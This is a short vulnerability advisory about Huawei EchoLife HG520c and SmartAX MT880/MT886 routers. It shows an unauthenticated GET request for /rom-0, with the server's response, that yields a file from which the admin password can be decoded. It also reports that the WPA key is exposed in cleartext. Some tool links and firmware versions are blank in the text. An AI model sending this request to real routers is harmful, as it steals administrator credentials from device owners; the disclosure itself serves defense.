Huawei Routers Multiple Vulnerabilities

The Huawei EchoLife HG520c router (Shodan search) contains an authentication bypass: a request for the /rom-0 file does not require authentication. The file can be reversed using available tools like the one at The first string returned is the admin password. I tested the following firmware version: This also affects the Huawei SmartAX MT880 (Shodan search) running firmware, and the MT886 running This is due to the use of RomPager as the underlying server.

GET /rom-0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Fri, 07 Jan 2000 06:11:11 GMT
Last-Modified: Tue, 07 Jan 1930 06:11:11 GMT
Content-Length: 16384
Server: RomPager/4.07 UPnP/1.0



Also, the /home_wlan.html page sends the WPA shared key in cleartext over HTTP.

